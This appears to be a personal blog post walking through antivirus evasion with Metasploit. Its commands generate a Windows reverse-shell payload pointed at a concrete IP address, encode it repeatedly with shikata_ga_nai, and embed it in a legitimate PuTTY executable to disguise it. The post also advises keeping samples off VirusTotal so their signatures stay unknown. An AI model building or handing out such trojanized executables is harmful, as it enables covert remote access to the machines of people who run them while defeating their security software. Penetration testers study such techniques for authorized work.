Antivirus Evasion with Metasploit

Antivirus Evasion With Metasploit

I’ve been working on producing a payload that can evade a specific antivirus product and figured I would share my notes in a post. Most documentation I have found has not been updated since 2010.

So the first thing we need to do is to figure out what payload we want to use. Since Metasploit is so well-known, there isn’t a huge difference in detection rates in their raw state as seen in the image below, so pick the one that works for you.

[caption id=”” align=”alignnone” width=”575”] Source: fuzzexp.org[/caption]

I’ll use windows/shell/reverse_tcp for this post. Pass the needed options to msfpayload and we’re done with the first step.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R

The next thing we need to is pipe that to msfencode to encode the payload. In its current version, Metsploit comes with 27 different encoders. Shikata Ga Nai is the only “excellent” rated x86 encoder of the bunch, so we’ll use that. We also want to run the encoder 5 times, set the template to EXE, and specify the output location, so those options are thrown in there as well.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5  -t exe -o /root/payloads/basic.exe

The problem with this is that AV will usually pick up Metasploit’s default templates, so we need to either develop our own or provide a different one. Since making a custom EXE template is a little past my current skill level, we’ll use PuTTy as our template. Download the executable from their website and put it somewhere you’ll remember and pass it to msfencode with the -x option.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -x /root/putty.exe -t exe -o /root/payloads/putty.exe

Now we have a quintuple-encoded reverse_tcp payload embedded in PuTTy. Sounds great, right? Not so much. This piece of malware’s signature is picked up by 30 of 40 antivirus solutions according to VirusTotal.

A quick note on VirusTotal: DON’T SUBMIT YOUR CUSTOM STUFF TO VIRUSTOTAL! The signature will be known and will begin to be detected. You’re best bet for testing is to have a box set up with the AV you’re trying to evade, update the signature the database, and then disconnect it from the network.

Obviously, there are more advanced techniques and different ways than I’ve provided here, but this should provide a foundation to build off of. I will make a new post on writing custom executable templates once I get better understanding of that process.

Until next time.

More information and advanced tactics can be found here:

http://fuzzexp.org/anti-virus-evasion-for-metasploit.html

http://www.rapid7.com/resources/videos/evading-anti-virus-detection-with-metasploit.jsp

cubalo

Ramblings of an OFFSEC grunt

Antivirus Evasion With Metasploit